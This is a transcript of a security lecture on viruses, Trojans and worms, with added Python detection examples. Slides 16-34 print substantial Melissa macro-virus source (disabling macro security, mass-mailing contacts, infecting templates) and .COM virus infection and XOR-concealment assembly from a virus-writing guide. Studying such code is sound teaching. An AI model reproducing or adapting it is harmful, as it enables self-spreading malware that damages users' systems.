Viruses, Trojan Horses, and Worms - PowerPoint PPT Presentation

Provided by: mhw78
Slides: 38

Transcript and Presenter's Notes

1
Viruses, Trojan Horses, and Worms
2
  • Propagation of malicious code
  • "Malicious" indicates the potential to do damage.
  • Usually classified by the type of propagation.
  • Sometimes classified by
  • the platforms and mechanisms it requires to run,
  • e.g. macro viruses.
  • A virus/Trojan/worm may not actually cause damage.

3
Viruses
  • Program or piece of code that will reproduce
    itself.
  • Sometimes performs a particular action.
  • Definition from RFC 1135
  • A virus is a piece of code that inserts itself
    into a host, including operating systems, to
    propagate. It cannot run independently. It
    requires that its host program be run to activate
    it.

4
Worm
  • A worm is similar to a virus, but it does not
    locally reproduce.
  • Propagates between systems only.
  • Definition from RFC 1135
  • A worm is a program that can run independently,
    will consume the resources of its host from
    within in order to maintain itself and can
    propagate a complete working version of itself on
    to other machines.

5
Macro Virus
  • Sometimes considered worms.
  • Require a host program to process/run them in
    order to execute.
  • Often written in VBA (Visual Basic for
    Applications) for Word, Access, Excel, PowerPoint,
    Outlook, etc.
  • E.g. Melissa

6
Trojan Horses
  • Code disguised as a benign program, but behaves in
    an unexpected, usually malicious manner.
  • The user needs to be convinced to accept/run it.
  • E.g. the Pokemon worm, which displays animated
    pictures of a bouncing Pikachu on your screen while
    it e-mails itself to everyone in your address
    book and prepares to delete every file.

7
The Trojan horse initially appears as an e-mail
with the title "Pikachu Pokemon" and the English
message "Pikachu is your friend."
The picture on this slide is what the users see when
executing pokemon.exe (its attachment). What
they don't see is the application e-mailing
itself and deleting files from the system.
8
Anatomy of a Virus
  • Two primary components
  • Propagation mechanism
  • Payload
  • Propagation
  • Method by which the virus spreads itself.
  • Old days: single PCs, transferred to other hosts
    by way of floppy diskettes.
  • Nowadays: the Internet.

9
  • Types of Propagation
  • Parasitic
  • Propagates by being a parasite on other files.
  • Attaches itself in some manner that still
    leaves the original file usable.
  • .com and .exe files of MS-DOS
  • Macro virus
  • Boot sector infectors
  • Copy themselves to the bootable portion of the
    hard (or floppy) disk.
  • The virus gains control when the system is booted.

10
  • Normal boot procedure
  • It first goes through its usual POST
    (Power On Self Test).
  • BIOS (Basic Input/Output System) does what is
    referred to as bootstrap: checking for a valid
    bootable disk.
  • For a hard drive to be bootable, it must contain
    a Master Boot Record (MBR).
  • Chunk of code that lies at the beginning of the
    hard drive.
  • Understands the partition table.

11
  • The MBR code will look for a particular partition
    that is marked bootable (MS-DOS fdisk "active"),
    and then transfer control to the code there.
  • This code is known as the boot sector.
  • Viruses have two opportunities to take control.
  • Insert themselves into the MBR position:
  • They can gain control under all situations,
  • at the expense of having to deal with reading and
    booting via the partition table.

12
  • Insert themselves into the boot sector of a
    partition
  • Boot sector viruses tend to take the existing MBR
    or boot sector code, relocate it elsewhere, and
    then insert themselves into the record.
  • When the system boots, they can do their thing,
    and then transfer control to the relocated code
    that they replaced.
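As an added illustration of the MBR layout described on slides 10-12 (example code written for this page, not from the presentation), the following Python parses a 512-byte sector into its boot code and partition table, finds the fdisk-style active entry, and hashes the boot-code region so that a rewritten MBR, the first place a boot-sector virus inserts itself, can be compared against a clean baseline. The partition layout and boot-code bytes are constructed samples.

```python
import hashlib
import struct
# Constructed example (not code from the slides): parse a 512-byte MBR as slides 10-12
# describe it, and hash the boot-code region so a rewritten MBR shows up as a changed baseline.
SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 0x1BE    # four 16-byte partition entries start here
ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"      # last two bytes of a valid MBR
ENTRY_FORMAT = "<B3sB3sII"        # status, CHS start, type, CHS end, LBA start, sector count

def parse_mbr(sector: bytes) -> dict:
    """Split an MBR into its boot code and partition table, checking the signature."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly one 512-byte sector")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature: BIOS would not boot this")
    partitions = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + i * ENTRY_SIZE
        status, _, ptype, _, lba, count = struct.unpack(ENTRY_FORMAT, sector[off:off + ENTRY_SIZE])
        partitions.append({"active": status == 0x80, "type": ptype,
                           "lba_start": lba, "sectors": count})
    return {"boot_code": sector[:PARTITION_TABLE_OFFSET], "partitions": partitions}

def active_partition(sector: bytes):
    """The entry the MBR code hands control to (fdisk 'active' flag = status 0x80)."""
    active = [p for p in parse_mbr(sector)["partitions"] if p["active"]]
    return active[0] if len(active) == 1 else None   # zero or several: not bootable as-is

def boot_code_hash(sector: bytes) -> str:
    """Hash the 446-byte boot code only; the partition table may change legitimately."""
    return hashlib.sha256(parse_mbr(sector)["boot_code"]).hexdigest()

def boot_code_unchanged(sector: bytes, baseline_sha256: str) -> bool:
    """Integrity check against a baseline taken from a known-clean sector."""
    return boot_code_hash(sector) == baseline_sha256

def build_sample_mbr(boot_code: bytes, active_index: int = 0) -> bytes:
    """Constructed sample sector with two hypothetical partitions (not a real disk)."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(boot_code)] = boot_code
    layout = [(0x83, 2048, 409600), (0x82, 411648, 8192)]   # (type, LBA start, sectors)
    for i, (ptype, lba, count) in enumerate(layout):
        off = PARTITION_TABLE_OFFSET + i * ENTRY_SIZE
        status = 0x80 if i == active_index else 0x00
        sector[off:off + ENTRY_SIZE] = struct.pack(ENTRY_FORMAT, status, b"\0\0\0",
                                                   ptype, b"\0\0\0", lba, count)
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)
```

Run it against a sector read with `dd` from a test disk image to take a baseline, and re-run later: the partition table may legitimately differ, but the boot-code hash should not.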

13
  • Multi-partite
  • Refers to viruses that can use multiple means of
    infection, such as
  • MBR
  • Boot sector
  • Parasitic

14
Payload
  • Refers to what the virus does (besides
    propagation) once executed.
  • Do nothing
  • Do cute things
  • Malicious damage such as delete your partition
    table.
  • Some viruses have a particular trigger.
  • Date
  • Number of successful infections

15
  • Smart viruses usually use an infrequent trigger so
    that they have ample time to ensure they have
    properly propagated before alerting the users.

16
Case Study I: Melissa
  • Melissa works by infecting the Document_Open()
    macro of Microsoft Word.
  • Runs immediately when the user opens the Word
    file.

    Private Sub Document_Open()
    On Error Resume Next
17
  • Disable the macro security features

    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
    Else
        p$ = "clone"
        CommandBars("Tools").Controls("Macro").Enabled = False
        Options.ConfirmConversions = (1 - 1)
        Options.VirusProtection = (1 - 1)
        Options.SaveNormalPrompt = (1 - 1)
    End If
18
  • MAPI stands for Messaging API, a way for
    Windows applications to interface with various
    e-mail functionalities.
  • A way to tell if it has already infected the
    host.

    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
19
  • To see if the application is Outlook
  • Compose a list of the first 50 e-mail addresses
    from the address book

        If UngaDasOutlook = "Outlook" Then
            DasMapiName.Logon "profile", "password"
            For y = 1 To DasMapiName.AddressLists.Count
                Set AddyBook = DasMapiName.AddressLists(y)
                x = 1
                Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
                For oo = 1 To AddyBook.AddressEntries.Count
                    Peep = AddyBook.AddressEntries(x)
                    BreakUmOffASlice.Recipients.Add Peep
                    x = x + 1
                    If x > 50 Then oo = AddyBook.AddressEntries.Count
                Next oo
20
  • Actually send the e-mails
  • Wrap up

                BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
                BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
                BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
                BreakUmOffASlice.Send
                Peep = ""
            Next y
            DasMapiName.Logoff
        End If
        p$ = "clone"
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
    End If
21
  • Check to see if the active document and document
    template are infected.
  • Infect it.

22
    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> "Melissa" Then
        If ADCL > 0 Then _
            ADI1.CodeModule.DeleteLines 1, ADCL
        Set ToInfect = ADI1
        ADI1.Name = "Melissa"
        DoAD = True
    End If
    If NTI1.Name <> "Melissa" Then
        If NTCL > 0 Then _
            NTI1.CodeModule.DeleteLines 1, NTCL
        Set ToInfect = NTI1
        NTI1.Name = "Melissa"
        DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo CYA
23
  • Modifying the Document_Open() and
    Document_Close() functions of the active document.
  • Every new document created will run the Melissa
    worm upon closing or saving.
  • Saving the current document.

24
Case Study: .com Virus
  • A .com virus may be divided into three parts.
  • Replicator
  • Concealer
  • Bomb (payload)

25
  • Replicator
  • Spread the virus.
  • Copy rest of the code at the end.

[Diagram: the uninfected file (P1 followed by P2) and the virus code (V1 followed by V2)]
26
  • Copy small portion of its code to the beginning
    of the file.
  • Copy the second part of itself to the end of the
    file.
  • What do V1 and V2 do?
  • V1 transfers control of the program to V2.

[Diagram: the file after infection, showing the positions of V1, P1, V2 and P2]
27
  • The code to do this is simple
  • The value of Duh must be changed to reflect the
    length of the file that is infected.
  • Duh = length of V1 + original size of the infected
    file + 256 (to account for the start position).
  • E.g. if file size = 79 and V1 = 6,
    Duh = 6 + 79 + 256 = 341.
  • Another approach

    JMP FAR PTR Duh                 ; Takes four bytes
    Duh DW V2_Start                 ; Takes two bytes

    ; Another approach:
    DB 11101001b                    ; Code for JMP (2-byte displacement), i.e. E9h
    Duh DW V2_Start - OFFSET Duh    ; 2-byte displacement
28
  • V2 contains the rest of the code.
  • The last part of V2 copies P1 over V1 (in memory)
    and then transfers the control to the beginning
    of the file (in memory).

    MOV SI, V2_START      ; V2_START is a LABEL marking where V2 starts
    SUB SI, V1_LENGTH     ; Go back to where P1 is stored
    MOV DI, 0100h         ; All COM files are loaded at CS:100h in memory
    MOV CX, V1_LENGTH     ; Move CX bytes
    REP MOVSB             ; DS:SI -> ES:DI
    MOV DI, 0100h
    JMP DI
29
  • The code assumes that P1 is located just before
    V2.
  • It also assumes ES equals CS. If these
    assumptions are false, we can change it
    accordingly.

    PUSH CS               ; Store CS
    POP ES                ; and move it to ES
                          ; Note: MOV ES, CS is not a valid instruction
    MOV SI, P1_START      ; Move from wherever P1 is stored
    MOV DI, 0100h         ; to CS:100h
    MOV CX, V1_LENGTH
    REP MOVSB
    MOV DI, 0100h
    JMP DI
30
  • The code first moves CS into ES.
  • Then sets the source pointer of MOVSB to where P1
    is located.
  • Note that the offset of P1 is 100h higher than
    the physical file location, as COM files are
    loaded starting from CS:100h.
  • Infecting .EXE files is much more complicated.

31
  • Replicator portion
  • Steps
    1. Find a file to infect.
    2. Check if it is already infected.
       If so, go back to 1.
    3. Infect it.
    4. If infected enough, quit;
       otherwise, go back to 1.
  • Finding a file to infect
  • Write a directory traversal procedure
  • Issuing FINDFIRST and FINDNEXT calls

32
  • Once you find the file, open it and read the
    first few bytes. If they are the same as the
    first few bytes of V1, then the file is already
    infected.
  • Infection should take the following steps
  • Change the file attributes to nothing.
  • Save the file date/time stamps.
  • Close the file.
  • Open it again in read/write mode.
  • Save P1 and append it to the end of the file.
  • Copy V1 to the beginning, but change the offset
    which it JMPs to so it transfers control
    correctly.
  • Append V2 to the end of the file.
  • Restore the file attributes and date/time.

33
Sample code to check if the file has been infected:

    mov ah, 3Fh                          ; Read first three
    mov cx, 3                            ; bytes of the file
    lea dx, [bp+offset buffer]           ; to the buffer
    int 21h
    mov ax, 4202h                        ; SEEK from EOF
    xor cx, cx                           ; DX:CX = offset
    xor dx, dx
    int 21h                              ; Returns filesize in DX:AX
    sub ax, virus_size + 3
    cmp word ptr [bp+offset buffer+1], ax
    jnz infect_it
bomb_out:
    mov ah, 3Eh                          ; else close the file
    int 21h                              ; and go find another
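The same check seen from the scanner's side, as an added example (not code from the slides or the guide they quote): parse the leading JMP rel16 of a .COM image, compute where it lands, and flag a file whose entry point jumps into its own tail. It generalizes the slide's size-specific comparison to any tail size, with the exact slide-33 test kept alongside it; all byte strings are constructed samples.

```python
import struct
# Added example, not code from the slides or the guide they quote: the defender's view
# of the slide-33 check. A .COM image is loaded at CS:0100h, so a leading JMP rel16
# (opcode E9h) lands at file offset 3 + rel16. Ordinary programs rarely jump straight
# to their own tail; a V2 appended at end-of-file is reached exactly that way.
JMP_REL16 = 0xE9

def entry_jump_target(image: bytes):
    """File offset the first instruction jumps to, or None if it is not a JMP rel16."""
    if len(image) < 3 or image[0] != JMP_REL16:
        return None
    rel = struct.unpack("<h", image[1:3])[0]   # signed 16-bit displacement
    target = 3 + rel                           # measured from the end of the 3-byte JMP
    return target if 0 <= target < len(image) else None

def looks_infected(image: bytes, tail_fraction: float = 0.25) -> bool:
    """Generic heuristic: the entry jump lands inside the last tail_fraction of the file.
    Assumes the appended code is smaller than the host; a tiny host carrying a large
    tail needs the size-specific test below instead."""
    target = entry_jump_target(image)
    return target is not None and target >= len(image) * (1 - tail_fraction)

def matches_known_body(image: bytes, virus_size: int) -> bool:
    """The slide-33 test itself: displacement == filesize - virus_size - 3,
    i.e. the jump lands exactly virus_size bytes before end-of-file."""
    target = entry_jump_target(image)
    return target is not None and target == len(image) - virus_size

def build_test_image(program: bytes, tail: bytes) -> bytes:
    """Constructed layout V1 | rest of program | tail: a 3-byte jump over the program."""
    body = program[3:]                         # what remains after V1 replaced P1
    return bytes([JMP_REL16]) + struct.pack("<H", len(body)) + body + tail
```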
34
  • Concealer
  • Conceals the program from notice by the everyday
    user and virus scanner.
  • A simple XOR encryption

    encrypt_val db ?
    decrypt:
    encrypt:
        mov ah, encrypt_val
        mov cx, part_to_encrypt_end - part_to_encrypt_start
        mov si, part_to_encrypt_start
        mov di, si
    xor_loop:
        lodsb                 ; DS:SI -> AL
        xor al, ah
        stosb                 ; AL -> ES:DI
        loop xor_loop
        ret
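Why a single-byte XOR concealer hides little, as an added example (not from the slides or the guide): the decryptor loop itself must be stored in clear, and there are only 256 keys, so a scanner can both match the loop's bytes and try every key against a known plaintext signature. The stub bytes and body are constructed samples.

```python
# Added example (not from the slides): a single-byte XOR concealer leaves two things
# a scanner can use: the decryptor loop stored in clear, and a key space of 256.
# Every byte string here is a constructed sample, not real virus code.

def xor_body(body: bytes, key: int) -> bytes:
    """The slide-34 loop in Python: each byte XORed with one key byte (encrypt == decrypt)."""
    return bytes(b ^ key for b in body)

# Machine code for the loop on the slide: lodsb / xor al,ah / stosb / loop back.
# The concealer cannot encode this part, since it has to run first.
DECRYPTOR_STUB = bytes.fromhex("ac32c4aae2fa")

def find_xor_key(sample: bytes, plaintext_signature: bytes):
    """Try all 256 keys ('x-raying'); return (key, offset) of the first decoded hit."""
    for key in range(256):
        pos = xor_body(sample, key).find(plaintext_signature)
        if pos != -1:
            return key, pos
    return None

def scan(sample: bytes, plaintext_signature: bytes) -> dict:
    """Two independent verdicts: cleartext stub match, and key-recovered body match."""
    recovered = find_xor_key(sample, plaintext_signature)
    return {"stub_match": sample.find(DECRYPTOR_STUB) != -1,
            "key": None if recovered is None else recovered[0],
            "body_match": recovered is not None}

def build_test_sample(body: bytes, key: int) -> bytes:
    """Constructed layout: clear decryptor stub followed by the XOR-encoded body."""
    return DECRYPTOR_STUB + xor_body(body, key)
```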
35
  • Bomb
  • Does all the nasty things to annoy the user.
  • Some possible bombs
  • System slowdown
  • Easily handled by trapping an interrupt and
    causing a delay when it activates.
  • File deletion.
  • Message Display.
  • Killing/Replacing the partition table or boot
    sector of the hard drive.

36
Anti-virus Techniques
  • Integrity/behavioral checkers
  • Use a good OS
  • Use a virus scanner on computers and e-mail servers.
  • Do not open attachments to e-mails.
  • Frequent backups.

37
References
  • Kevin L. Poulsen, "Hack Proofing Your Network:
    Internet Tradecraft", Chapter 14, pp. 383-405
  • Dark Angel's Phunky Virus Writing Guide,
    http://www.sirkussystem.com/virus.html
  • Introduction
  • Installment II: the replicator